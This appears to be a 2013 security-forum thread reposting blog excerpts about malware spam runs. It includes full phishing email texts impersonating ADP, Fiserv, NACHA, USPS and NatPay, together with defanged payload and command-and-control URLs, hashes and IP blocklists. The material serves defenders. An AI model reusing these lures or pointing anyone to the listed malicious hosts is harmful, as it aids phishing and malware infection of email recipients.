- http://blog.dynamoo.com/2013/05/malware-sites-to-block-29513.html
29 May 2013 - "These domains and IP addresses are connected to this malware spam run* and belong to a group I call the "Amerika" gang (because they tend to use fake US addresses for their WHOIS details but really seem to be Russian). It's quite a long set of lists: first there is a list of malware domains, then a list of malicious IPs and their web hosts, followed by a plain recommended blocklist list of IPs for copy-and-pasting... You might notice something odd going on at the University of Illinois in the 128.174.240.0/24 range. Hmm...
Recommended IP blocklist:
5.175.155.183
37.131.214.69
41.89.6.179
42.62.29.4
50.193.197.178
54.214.22.177
62.109.28.0/22
77.237.190.0/24
82.50.45.42
91.93.151.127
91.193.75.0/24
94.249.208.228
95.43.161.50
99.61.57.201
103.7.251.36
109.169.64.170
112.196.2.39
114.4.27.219
114.247.121.139
115.28.35.163
122.160.51.9
128.174.240.0/24
140.117.164.154
151.1.224.118
159.253.18.0/24
162.209.12.86
166.78.136.235
177.5.244.236
178.20.231.214
178.209.126.87
181.52.237.17
183.82.221.13
186.215.126.52
188.32.153.31
190.106.207.25
192.154.103.81
192.210.216.53
197.246.3.196
201.65.23.153
201.170.148.171
204.45.7.213
208.68.36.11
210.61.8.50
212.179.221.31
213.113.120.211
217.174.211.1
222.200.187.83 ..."
(More detail at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/05/amazoncom-spam-federal-credit-unioncom.html
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment E-mail Messages - 2013 May 29
Malicious Personal Pictures Attachment E-mail Messages - 2013 May 29
Fake Electronic Payment Cancellation E-mail Messages - 2013 May 29
Fake Invoice Statement Attachment E-mail Messages - 2013 May 29
Fake Sample Product Offering E-mail Messages - 2013 May 29
Fake Bank Account Statement E-mail Messages - 2013 May 29
Fake Order Invoice Notification E-mail Messages - 2013 May 29
Fake Billing Statement E-mail Messages - 2013 May 29
Fake Credit Card Fraud Alert E-mail Messages - 2013 May 29
Fake Bank Deposit Notification E-mail Messages - 2013 May 29
Fake Payment Transfer Notification E-mail Messages - 2013 May 29
Fake Purchase Order Request E-mail Messages - 2013 May 29
Fake Product Quote Inquiry E-mail Messages - 2013 May 29
(Links with more detail available at the cisco URL above.)
:fear::fear: :mad:
AplusWebMaster
2013-05-31, 00:28
FYI...
Fake ADP Funding Notification - Debit Draft
- http://threattrack.tumblr.com/post/51739676575/adp-funding-notification-debit-draft
May 30, 2013 - "Subjects Seen:
ADP Funding Notification - Debit Draft
ADP Invoice Reminder
Typical e-mail details:
Your Transaction Report(s) have been uploaded to the web site:
https :/ /www.flexdirect. adp .com/client/login.aspx
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services
Malicious URLs
www .primolevi .gov.it/andromeda/index.html
annbrauner .com/yeltsin/index.html
www. omegaservice .it/ulcerate/index.html
www. sweethomesorrento .it/unwell/index.html
www. italtrike .tv/tomboys/index.html
kalimat.egyta .com/swearer/titan.js
www. asitecsrl .com/servicemen/ethic.js
www. mbbd .it/dzerzhinsky/bewilders.js
4rentcoloradosprings .com/news/cross_destroy-sets-separate.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3fbaedcc125a00077dc97c7dd8c59d82/tumblr_inline_mnmkcb1bxv1qz4rgp.png
___
Fake ADP SPAM / 4rentconnecticut .com and 174.140.171.233
- http://blog.dynamoo.com/2013/05/adp-spam-4rentconnecticutcom-and.html
30 May 2013 - "These fake ADP spams lead to malware on 4rentconnecticut .com:
Date: Thu, 30 May 2013 12:41:28 -0500 [13:41:28 EDT]
From: "ADPClientServices @adp .com" [ADPClientServices @adp .com]
Subject: ADP Funding Notification - Debit Draft
Your Transaction Report(s) have been uploaded to the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services
====================
Date: Thu, 30 May 2013 08:45:16 -0800 [12:45:16 EDT]
From: ADP Inc [ADP_FSA_Services @ADP .com]
Subject: ADP Invoice Reminder
Your latest ADP Dealer Services Invoice is now available to view or pay online at ADP Online Invoice Management .
To protect the security of your data, you will need to enter your ID and password, then click on Access your Online Invoice Management account.
Total amount due by May 31, 2013
$26062.29
If you have already sent your payment please disregard this friendly reminder and Thank you for choosing ADP.
Questions about your bill?
Contact David Nieto by Secure Mail.
Note: This is an automated email. Please do not reply.
The link in the email goes to a legitimate -hacked- site and then tries to load three different scripts, currently:
[donotclick]kalimat.egyta .com/swearer/titan.js
[donotclick]www.asitecsrl .com/servicemen/ethic.js
[donotclick]www.mbbd .it/dzerzhinsky/bewilders.js
From there the victim is directed to the main malware landing page at [donotclick]4rentconnecticut .com/news/cross_destroy-sets-separate.php on 174.140.171.233 (DirectSpace LLC, US). A look at URLquery shows many suspect URLs on this server* and VirusTotal also reports several malicious URLs**. It appears that every single domain on this server has been compromsed. Blocking the IP address is the easiest way to mitigate against this problem..."
* http://urlquery.net/search.php?q=174.140.171.233&type=string&start=2013-05-15&end=2013-05-30&max=50
** https://www.virustotal.com/en/ip-address/174.140.171.233/information/
___
Fake NewEgg .com SPAM / 174.140.171.233
- http://blog.dynamoo.com/2013/05/neweggcom-spam-174140171233.html
30 May 2013 - "This fake NewEgg.com spam leads to malware on 174.140.171.233:
Date: Thu, 30 May 2013 16:06:12 +0000 [12:06:12 EDT]
From: Newegg [info @newegg .com]
Subject: Newegg.com - Payment Charged...
Screenshot: https://lh3.ggpht.com/-m_EUbjfZItE/Uae8YrA4CZI/AAAAAAAABPs/iNxxtEdGGnc/s1600/newegg2.png
The malicious payload is any one of a number of domains hosted on 174.140.171.233 which is also being used in this attack*. Blocking the IP is the easiest way to protect against the malicious sites hosted on that server."
* http://blog.dynamoo.com/2013/05/adp-spam-4rentconnecticutcom-and.html
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Report Summary E-mail Messages - 2013 May 30
Fake Scanned Document Attachment E-mail Messages - 2013 May 30
Fake Contract Document Information E-mail Messages - 2013 May 30
Fake Product Supply Quote E-mail Messages - 2013 May 30
Fake Electronic Payment Cancellation E-mail Messages - 2013 May 30
Malicious Attachment E-mail Messages - 2013 May 30
Fake Business Complaint Notification E-mail Messages - 2013 May 30
Fake Payroll Report E-mail Messages - 2013 May 30
Fake Product Supply Request E-mail Messages - 2013 May 30
(Links and more detail at the cisco URL above.)
:fear::fear:
AplusWebMaster
2013-05-31, 13:55
FYI...
Fake Vodafone SPAM serving malware in the wild ...
- http://blog.webroot.com/2013/05/31/fake-vodafone-u-k-images-themed-malware-serving-spam-campaign-circulating-in-the-wild/
May 31, 2013 - "We have just intercepted yet another spamvertised malware serving campaign, this time impersonating Vodafone U.K., in an attempt to trick the company’s customers into thinking that they’ve received an image. In reality, once users execute the malicious attachments, their PCs automatically join the botnet operated by the cybercriminal...
Detection rate for the malicious executable – MD5: 4e148480749937acef8a7d9bc0b3c8b5 * ... VirTool:Win32/Obfuscator.ACP; Backdoor.Win32.Androm.sed.
Once executed, the sample creates an Alternate Data Stream (ADS) –
C:\Documents and Settings\User\Application Data\dbgbshes\habeegeg.exe:Zone.Identifier, as well as installs itself at Windows startup.
It then creates the following files on the affected hosts:
C:\Documents and Settings\User\Application Data\dbgbshes\habeegeg.exe
C:\DOCUME~1\User\LOCALS~1\Temp\IMG.JPEG.exe
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\wbem\wbemdisp.TLB ...
It then phones back to the following C&C server:
hxxp ://85.143.166.158 /fexco/com/index.php ..."
* https://www.virustotal.com/en/file/a7ebf5572e51fe7d5ba9969c77b3fa093b159c55b24d1b9963cf7187e9338678/analysis/
File name: IMG 9857648740.JPEG.exe
Detection ratio: 29/47
Analysis date: 2013-05-29
- http://centralops.net/co/DomainDossier.aspx
85.143.166.158
canonical name webcluster.oversun.clodo .ru.
addresses 62.76.181.230 * 62.76.181.229
inetnum: 85.143.164.0 - 85.143.167.255
descr: 192012, St.Petersburg
country: RU
___
Medfos sites to block 31/5/13
- http://blog.dynamoo.com/2013/05/medfos-sites-to-block-31513.html
31 May 2013 - "The following domains and IPs are currently being used as C&C servers by the Medfos family of trojans* (this** one*** in particular):
84.32.116.110
85.25.132.55
173.224.210.244
184.82.62.16
188.95.48.152 ...
The domains listed are used in conjunction with hundreds of subdomains. Blocking the main domain will be the best approach, else the ones that I have been able to determine are listed here****."
* http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fMedfos
** https://www.virustotal.com/en/file/9a86e358ed6154025f23bdbf2b39df3bad1f078086ff9492441642c82c7fb399/analysis/
*** http://www.threatexpert.com/report.aspx?md5=5b609450d101ff9ba921cabf331d1e39
**** http://pastebin.com/L9UuMAC7
___
USSR old domain name attracts cybercriminals
- https://www.nytimes.com/aponline/2013/05/31/world/europe/ap-eu-soviet-hacker-haven.html
May 31, 2013 AP - "... the .su Internet suffix assigned to the USSR in 1990 has turned into a haven for hackers who've flocked to the defunct superpower's domain space to send spam and steal money... other obscure areas of the Internet, such as the .tk domain associated with the South Pacific territory of Tokelau, have been used by opportunistic hackers... The most notorious site was Exposed .su, which purportedly published credit records belonging to President Barack Obama's wife, Michelle, Republican presidential challengers Mitt Romney and Donald Trump, and celebrities including Britney Spears, Jay Z, Beyonce and Tiger Woods. The site is now defunct. Other Soviet sites are used to control botnets — the name given to the networks of hijacked computers used by criminals to empty bank accounts, crank out spam, or launch attacks against rival websites. Internet hosting companies generally eliminate such sites as soon as they're identified. But Swiss security researcher Roman Huessy, whose abuse.ch blog* tracks botnet control sites, said hackers based in Soviet cyberspace can operate with impunity for months at a time. Asked for examples, he rattled off a series of sites actively involved in ransacking bank accounts or holding hard drives hostage in return for ransom — brazenly working in the online equivalent of broad daylight..."
* https://www.abuse.ch/?p=3581
:fear::mad:
AplusWebMaster
2013-06-01, 15:20
FYI...
NACHA .ZIP file attachment spam
- http://threattrack.tumblr.com/post/51863523782/nacha-zip-file-attachment-spam
June 1, 2013 - "Subjects Seen:
ACH Payment rejected: #<uniq_id>
Typical e-mail details:
Ach payment canceled Transaction ID: #[removed] The ACH transaction, recently initiated from your checking account (by you or any other person), was canceled by the other financial institution.
Transaction Status: Rejected Transaction ID: [uniq number removed\
Amount : $
To view more details for this transaction , please check the attached file .
NACHA works to maintain the privacy of any personally identifiable information (name, mailing address, e-mail address, etc.) that may be collected though our Web site. This Web site has security measures in place; however, NACHA does not represent, warrant or guarantee that personal information will be protected against unauthorized access, loss, misuse or alterations. Similarly, NACHA disclaims liability for personal information submitted through this Web site. Users are hereby advised that they submit such personal information at their own risk.
Thank you,
13450 Sunrise Valley Drive
Suite 100 Herndon
VA 20171
© 2013 NACHA - The Electronic Payments Association
Malicious URLs
Spam contains a malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f807fca5650acf400717cc57abd42780/tumblr_inline_mnp9r6IWMy1qz4rgp.png
___
iOS7 announcement prompts themed ransomware kits
- http://community.websense.com/blogs/securitylabs/archive/2013/05/31/iOS7-announcement-prompts-themed-ransomware-kits.aspx
May 31, 2013 - "... phishing domain related to the imminent release of the Apple iOS7 Operating System. As gossips circulate news in the wild about iOS7 after the D11 conference... cybercriminals are setting up a foundation for phishing and malicious activities...
ios7news .net - 85.25.20.153 **
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7140.sshto004.PNG
... As a ransomware toolkit, Silence Locker can generate a malicious file associated with familiar police enforcement pictures, based on the country of the potential victims. For example, in the following page the fake FBI Cyber Squad Investigation team is bound with a binary file that has been uploaded:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0741.sshto003.PNG
... we noticed that the AutoIT tool was used to package the malware. This conforms to the current trend of packaging malware to make detection more difficult. We continued our investigation by gathering some telemetry about the IP address that hosts this domain (ios7news .net). From what we discovered, it seems that this IP address is also used for other phishing domains... The domain "hxxp ://gamingdaily .us" is most likely a phishing domain for a gaming news website that is also used to host the exploit kit BleedingLife*... both IT news and rumors could be used by the attackers to leverage people's curiosity, as was done here. In this case, we can suppose (due to details such as the open directory access) that the attackers are going to use and configure that domain for malicious activities based on ransomware."
* http://community.websense.com/blogs/securitylabs/pages/bleeding-life-exploit-kit.aspx
"... The Bleeding Life exploit kit uses exploits which can bypass ASLR and DEP, which means this product could be used successfully against Windows 7 and Windows Vista operating systems..."
** https://www.google.com/safebrowsing/diagnostic?site=AS:8972
:mad::fear:
AplusWebMaster
2013-06-03, 18:35
FYI...
Malicious photo attachment Spam
- http://threattrack.tumblr.com/post/52056798783/malicious-photo-attachment-spam
June 3, 2013 - "Subjects Seen:
Check the attachment you have to react somehow to this picture
Typical e-mail details:
Hi there ,
I got to show you this picture in attachment. I can’t tell who gave it to me sorry but this chick looks a lot like your ex-gf. But who’s that dude??
Malicious File Name and MD5:
IMG[removed].zip (724bb53c12ebeb9df3e8525c6e1f9052)
ThreatAnalyzer Report: http://www.threattracksecurity.com/enterprise-security/sandbox-software.aspx
- http://db.tt/2ZLJo3Wq [PDF]
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4f69fbca5498fae1e5de00540ee6e4ba/tumblr_inline_mntm1nK1JB1qz4rgp.png
___
Fivserv Secure Email Notification Spam
- http://threattrack.tumblr.com/post/52070758101/fivserv-secure-email-notification-spam
June 3, 2013 - "Subjects Seen:
Fiserv Secure Email Notification - [removed]
Typical e-mail details:
You have received a secure message
Read your secure message by opening the attachment, SecureMessage_[removed].zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - [removed]
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
To access from a mobile device, forward this message to mobile-- @res.fiserv -- .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly...
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
nourrirnotremonde .org/ponyb/gate.php
zoecopenhagen .com/ponyb/gate.php
goldenstatewealth .com/ponyb/gate.php
190.147.81.28 /yqRSQ.exe
paulcblake .com/ngY.exe
207.204.5.170 /PXVYGJx.exe
netnet-viaggi .it/2L6L.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/59a429729e0a3967dd6de6a7a67b2a00/tumblr_inline_mntxj0rqkk1qz4rgp.png
- http://blog.dynamoo.com/2013/06/fiserv-secure-email-notification-spam.html
3 Jun 2013 - "This spam email contains an encrypted ZIP file with password-protected malware.
Date: Mon, 3 Jun 2013 14:11:14 -0500 [15:11:14 EDT]
From: Fiserv Secure Notification [secure .notification @fiserv .com]
Subject: Fiserv Secure Email Notification - IZCO4O4VUHV83W1
You have received a secure message
Read your secure message by opening the attachment, SecureMessage_IZCO4O4VUHV83W1.zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - Iu1JsoKaQ
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it...
If you have concerns about the validity of this message, please contact the sender directly.
Of course, it would be supremely pointless password protecting a document and then including the password in the email! The file has been password protected in an attempt to thwart anti-virus software. In this case, the password for the file SecureMessage_IZCO4O4VUHV83W1.zip is Iu1JsoKaQ which in turn leads to a file called SecureMessage_06032013.exe (note the date in included in that filename). At the moment the VirusTotal detection rate is a so-so 16/47*. The ThreatTrack analysis** identifies some locations that the malware phones home to:
netnet-viaggi .it
paulcblake .com
74.54.147.146
116.122.158.195
190.147.81.28
194.184.71.7
207.204.5.170 ..."
* https://www.virustotal.com/en/file/8de188a7813dc1d2de3c610828dcdd09b266fba317100d814a7811b6615ca8e6/analysis/1370289657/
File name: SecureMessage_06032013.exe
Detection ratio: 16/47
Analysis date: 2013-06-03
** http://www.dynamoo.com/files/analysis_31012_2994f3319096ad15b31f3f3135add304.pdf
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Secure Message Notification E-mail Messages - 2013 Jun 03
Malicious Attachment E-mail Messages - 2013 Jun 03
Fake Product Order E-mail Messages - 2013 Jun 03
Fake Bank Transfer Notification E-mail Messages - 2013 Jun 03
Fake Customer Complaint Notification E-mail Messages - 2013 Jun 03
Malicious Attachment E-mail Messages - 2013 Jun 03
Fake Order Invoice Notification E-mail Messages - 2013 Jun 03
Fake Payment Confirmation Notification E-mail Messages - 2013 Jun 03
Malicious Attachment E-mail Messages - 2013 Jun 03
Fake Remittance Slip with Invalid Digital Signature E-mail Messages - 2013 Jun 03
Fake Scanned Document Attachment E-mail Messages - 2013 Jun 03
Fake Product Order Quotation E-mail Messages - 2013 Jun 03
Fake Product Order Request E-mail Messages - 2013 Jun 03
Fake Online Dating Personal Photos Sharing E-mail Messages - 2013 Jun 03
Fake Purchase Order Request E-mail Messages - 2013 Jun 03
Fake Online Dating Proposal E-mail Messages - 2013 Jun 03
Fake Product Order Quotation E-mail Messages - 2013 Jun 03
Fake Processes and Subpoenas Notification E-mail Messages - 2013 Jun 03
(More detail and links available at the cisco URL above.)
:mad: :fear:
AplusWebMaster
2013-06-05, 17:08
FYI...
Fake Xerox WorkCentre Attachment Spam
- http://threattrack.tumblr.com/post/52218547886/xerox-workcentre-attachment-spam
June 5, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Reply to: Xerox.WorkCentre @[removed]
Device Name: Not Set
Device Model: XEROX-2178N
Location: Not Set
File Format: PDF (Medium)
File Name: Xerox_Scan_06-04-2013-466.zip
Resolution: 200dpi x 200dpi
Attached file is scanned image in PDF format.
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
4renttulsa .com/ponyb/gate.php
4rentunitedstates .com/ponyb/gate.php
newsouthdental .com/jENnMd2X.exe
leclosdelentaille .fr/2Zxq1hZ.exe
forexwinnersacademy .com/fmy.exe
Malicious File Name and MD5:
Xerox_Scan_06-04-2013-[removed].zip (e45db46d63330f20ef8c381f6c0d8f1a)
Xerox_Scan_06-04-2013-[removed].exe (7e4b3aca9a2a86022d50110d5d9498e2)
fmy.exe (c3c103ebb3ce065b8b62b08fba40483f)
ThreatAnalyzer Report: http://db.tt/yJoSwFM8 [PDF]
199.168.184.198, 82.165.79.64, 69.163.187.171, 216.172.167.17
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/31bd7cd2c1203ff2dc8b34df36ca50a6/tumblr_inline_mnx8zd58Hw1qz4rgp.png
___
Don't like clicking when you won't know where you're going?
- http://urlxray.com/
Find out where shortened URLs lead to without clicking on them
Enter any shortened URL...
___
More Champions Club Community SPAM
- http://blog.dynamoo.com/2013/06/more-champions-club-community-spam.html
5 June 2013 - "... the originating IP is 217.174.248.194 [web1-opp2.champions-bounce .co.uk] (Fasthosts, UK). Spamvertised domains are champions.onlineprintproofing .co.uk also on 217.174.248.194 and championsclubcommunity .com on 109.203.113.124 (Eukhost, UK). Give these spammers a wide berth..."
- http://blog.dynamoo.com/2013/03/champions-club-community.html
___
Backdoor Wipes MBR, Locks Screen
- http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/
June 5, 2013 - "German users are at risk of having their systems rendered unusable by a malware that we’re seeing being sent via spam messages. This particular malware, on top of its ability to remotely control an affected system, is able to wipe out the Master Boot Record – a routine that had previously caused a great crisis in South Korea. We recently uncovered this noteworthy backdoor as an attached file in certain spam variants. The spam sample we found is in German and forces recipients to pay for a certain debt, the details of which are contained in the attachment. Those who open the attachment are actually tricked into executing the malware, in this instance, a backdoor.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/backdoor-attached-file.jpg
Like any backdoor, BKDR_MATSNU.MCB performs certain malicious commands, which include gathering machine-related information and send it to its command-and-control (C&C) server. However, the backdoor’s most noteworthy feature is its capability to wipe the Master Boot Record (MBR). The wiping of the MBR was recently used in the high-profile (but different) attack against certain South Korean institutions. What makes this routine problematic is that once done, infected systems won’t reboot normally and will leave users with unusable machines. Another command is the backdoor’s capability to lock and unlock a screen. This locking of screen is definitely a direct copy from ransomware’s playbook, in which the system remains completely or partially inaccessible unless the victim pays for the “ransom”. Ransomware is a malware that locks an infected system’s screen and display a message, which instructs users to pay for a “ransom” thru certain payment methods... During our testing, BKDR_MATSNU.MCB readily performed the MBR wiping routine. The remote malicious (via server) only needs to communicate this command to the backdoor and it can execute this routine immediately. However, this is not the case with the screen locking. BKDR_MATSNU.MCB is likely to download a different module onto the system, which will then lock the screen. As to what routines will be first executed or not is dependent on the remote malicious user. Attackers may opt to lock the screen first then initiate the MBR overwriting or just initiate any of the two. Another possible scenario is that another version of BKDR_MATSNU is integrated with the screen blocking routine, which will make the screen locking command easier to execute... For better protection, users should always be cautious be the email they receive and must not readily open any attachments. If your system is already infected, it is a safer bet to not pay for the “ransom”, as paying does not guarantee anything..."
:mad: :fear:
AplusWebMaster
2013-06-06, 18:57
FYI...
Fake Innex, Inc SPAM
- http://blog.dynamoo.com/2013/06/innex-inc-fake-spam.html
6 June 2013 - "Innex, Inc is a real company. This spam email message is -not- from Innex, Inc.
From: PURCHASING DEPARTMENT [fdmelo @fucsalud .edu.co]
To:
Reply-To: pinky .yu@chanqtjer .com.tw
Date: 6 June 2013 08:55
Subject: Innex, Inc.
Sir/Madam,
Our Company is interested in your product, that we saw in trading site,
Your early reply is very necessary for further detail specification immediately you receive our email.
Regards
Purchasing manager,
Mr James Vincent ...
Innex is based in California in the US, but the email appears to be from a university in Colombia and solicits replies to an email address in Taiwan. Note as well that the email is very vague about the "product" they are interested in, and the To: field is blank as the recipient list has been suppressed (i.e. it is being sent to multiple recipients). Avoid."
___
rxlogs .net: spam or Joe Job?
- http://blog.dynamoo.com/2013/06/rxlogsnet-spam-or-joe-job.html
6 June 2013 - "I've had nearly one hundred of these this morning. Is it a genuine spam run or a Joe Job**?
Date: Thu, 6 Jun 2013 09:44:18 -0700 [12:44:18 EDT]
From: Admin [whisis101 @gmail .com]
Reply-To: ec2-abuse @amazon .com
facebook
You recently requested a new password for your Facebook account. It looks like we sent you an email with a link to reset your password 4 ago.
This is a reminder that you need to complete this action by clicking this link and Confirm or Cancel your request.
If you have any other questions, please visit our Help Center.
Thanks,
The Facebook Team
Screenshot: https://lh3.ggpht.com/-ToJ6cyCDWME/UbBAFLEAhNI/AAAAAAAABP8/PODZRA25wh0/s1600/rxlogs.png
The link in the emails goes to multiple pages on rxlogs .net which as far I as can tell is -not- malware*, but is a blog about online pharmacies. But is is spam? Well, let's dig a little deeper.. Each email comes from a different IP, probably being sent by a botnet. That's pretty normal for pharma spam, but in this case there appear to be some anomalous addition headers.. The mildly munged headers from an example email are quite revealing. It appears that there are references to Amazon ECS (Amazon's cloud service) and a valid sender address of whisis101 -at- gmail.com injected into the headers, along with a load of other elements that you'd expect from botnet spam. The email has at no point hit either Gmail or Amazon, but the headers appear to have been -faked- in order to generate reports to Amazon and/or Gmail. It's worth noting that rxlogs .net is hosted on 107.20.147.122 which is an Amazon IP... I believe this is a Joe Job and not a "genuine" spam run, and rxlogs .net is simply another victim of the bad guys."
* http://urlquery.net/report.php?id=2919241
Source IP: 94.102.48.224 - Known RBN IP
** http://searchsecurity.techtarget.com/definition/Joe-job
___
Fake NatPay SPAM / usforclosedhomes .net
- http://blog.dynamoo.com/2013/06/natpay-transmission-confirmation-spam.html
6 Jun 2013 - "This fake NatPay spam leads to malware on usforclosedhomes .net.
Version 1:
Date: Thu, 6 Jun 2013 20:53:08 +0600 [10:53:08 EDT]
From: National Payment Automated Reports System [dunks @services .natpaymail .net]
Subject: Transmission Confirmation ~26306682~N25BHHL1~
Transmission Verification
Contact Us
To:
NPC Account # 26306682
Xavier Reed
Re:
NPC Account # 26306682
D & - D5
Thursday, July 04, 2013, Independence Day is a Federal Banking Holiday. All banks are closed for this holiday, therefore NatPay will not be able to process any files on that date. If you plan on transmitting for a paydate that falls between Thursday, July 04, 2013 and Thursday, July 11, 2013 you will need to the file a day earlier.
Batch Number 408
Batch Description VENDOR PAY
Number of Dollar Entries 2
Number of Prenotes 0
Total Deposit Amount $3,848.19
Total Withdraw Amount $3,848.19
Batch Confirmation Number 50983
Date Transmitted Thursday, June 06, 2013 ...
---
Version 2:
Date: Thu, 6 Jun 2013 09:59:06 -0500
From: National Payment Automated Reports System [lemuel @emalsrv.natpaymail .com]
Subject: Transmission Confirmation ~10968697~607MPYRC~
Transmission Verification
Contact Us
To: NPC Account # 10968697
Benjamin Turner
Re: NPC Account # 10968697
D & - MN
Thursday, July 04, 2013, Independence Day is a Federal Banking Holiday. All banks are closed for this holiday, therefore NatPay will not be able to process any files on that date. If you plan on transmitting for a paydate that falls between Thursday, July 04, 2013 and Thursday, July 11, 2013 you will need to the file a day earlier.
Batch Number 219
Batch Description VENDOR PAY
Number of Dollar Entries 2
Number of Prenotes 0
Total Deposit Amount $2,549.12
Total Withdraw Amount $2,549.12
Batch Confirmation Number 24035 ...
The malicious payload is on [donotclick]usforclosedhomes .net/news/walls_autumns-serial.php (report here*) hosted on the following IPs:
41.89.6.179 (Kenya Education Network, Kenya)
46.18.160.86 (Saudi Electronic Info Exchange Company (Tabadul) JSC, Saudi Arabia)
93.89.235.13 (FBS Bilisim Cozumleri, Cyprus)
112.170.169.56 (Korea Telecom, South Korea)
The cluster of IPs and domains this belongs to identifies it as part of the Amerika spam run.
Blocklist:
41.89.6.179
46.18.160.86
93.89.235.13
112.170.169.56 ..."
* http://urlquery.net/report.php?id=2926577
___
USPS Package Pickup Spam
- http://threattrack.tumblr.com/post/52314898634/usps-package-pickup-spam
June 6, 2013 - "Subjects Seen:
USPS - Your package is available for pickup ( Parcel [removed])
Typical e-mail details:
We attempted to deliver your item at 6 Jun 2013.
Courier service could not make the delivery of your parcel.
Status Deny / Invalid ZIP Code.
If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.
Label/Receipt Number: [removed]
Expected Delivery Date: Jun 6, 2013
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office...
Malicious URLs
michaelscigars .net/ponyb/gate.php
montverdestore .com/ponyb/gate.php
errezeta .biz/ToSN79T.exe
190.147.81.28 /yqRSQ.exe
207.204.5.170 /PXVYGJx.exe
archeting .it/86zP.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/034a2b278c131b49522ab34a745f2670/tumblr_inline_mnziitVIUE1qz4rgp.png
___
Global $200M credit card hacking ring busted
- http://www.reuters.com/article/2013/06/05/us-cybercrime-hacking-arrests-idUSBRE95419G20130605
Jun 5, 2013 - "Eleven people in the United States, the UK and Vietnam have been arrested and accused of running a $200 million worldwide credit card fraud ring, U.S. and UK law enforcement officials said... Federal prosecutors in New Jersey said they had filed charges against a 23-year-old man from Vietnam... authorities in Vietnam had arrested Duy Hai Truong on May 29 in an effort to break up a ring he is accused of running with co-conspirators, who were not named in the statement... The arrests come as law enforcement officials around the world are cracking down on Internet-related heists. Two weeks ago, authorities raided Liberty Reserve, a Costa Rica-based company that provided a virtual currency system used frequently by criminals to move money around the world without using the traditional banking system. Earlier last month, authorities arrested seven people involved in a $45 million heist in which hackers removed limits on prepaid debit cards and used ATM withdrawals to drain cash from two Middle Eastern banks... the charges were filed in New Jersey's federal court because some of the victims of the scheme are residents of the state. Prosecutors claim Truong and accomplices stole information related to more than a million credit cards and resold it to criminal customers... According to the complaint, Truong hacked into websites that sold goods and services over the Internet and collected personal credit card information from the sites' customers. "The victims' credit cards incurred, cumulatively, more than $200 million in fraudulent charges," the complaint said..."
- http://www.soca.gov.uk/news/552-eleven-arrests-as-global-investigation-dismantles-criminal-web-forum
:fear::fear: :sad:
AplusWebMaster
2013-06-07, 15:35
FYI...
Malware sites to block 7/6/13
- http://blog.dynamoo.com/2013/06/malware-sites-to-block-7613.html
7 June 2013 - "Two IPs that look related, the first is 37.235.48.185 (Edis, Poland or Austria) which host some domains that are also found here** (158.255.212.96 and 158.255.212.97, also Edis) that seem to be used in injection attacks. I can identify the following domains linked to 37.235.48.185:
faggyppvers5 .info
finger2 .climaoluhip.org
linkstoads .net
node1.hostingstatics .org
node2.hostingstatics .org
Injecting some of the same sites as the domains on the above IPs is jstoredirect .net which is currently offline but was hosted on 149.154.152.18 which is also Edis (can you see the pattern yet?) so I would assume that they are linked. In the few days that jstoredirect .net was online it managed to infect over 1500 sites*.
Aggregate blocklist:
98.126.9.34
114.142.147.51
158.255.212.96
158.255.212.97
nethostingdb .com
netstoragehost .com
connecthostad .net
climaoluhip .org
hostingstatics .org
systemnetworkscripts .org
numstatus .com
linkstoads .net
faggyppvers5 .info
jstoredirect .net ..."
* http://www.google.com/safebrowsing/diagnostic?site=jstoredirect.net
** http://blog.dynamoo.com/2013/05/something-bit-evil-on-15825521296-and.html
___
Fake USPS SPAM / USPS_Label_861337597092.zip
- http://blog.dynamoo.com/2013/06/usps-spam-uspslabel861337597092zip.html
6 June 2013 - "This fake USPS spam contains a malicious attachment:
Date: Thu, 6 Jun 2013 10:43:56 -0500 [11:43:56 EDT]
From: USPS Express Services [service-notification @usps .com]
Subject: USPS - Your package is available for pickup ( Parcel 861337597092 )
Postal Notification,
We attempted to deliver your item at 6 Jun 2013.
Courier service could not make the delivery of your parcel.
Status Deny / Invalid ZIP Code.
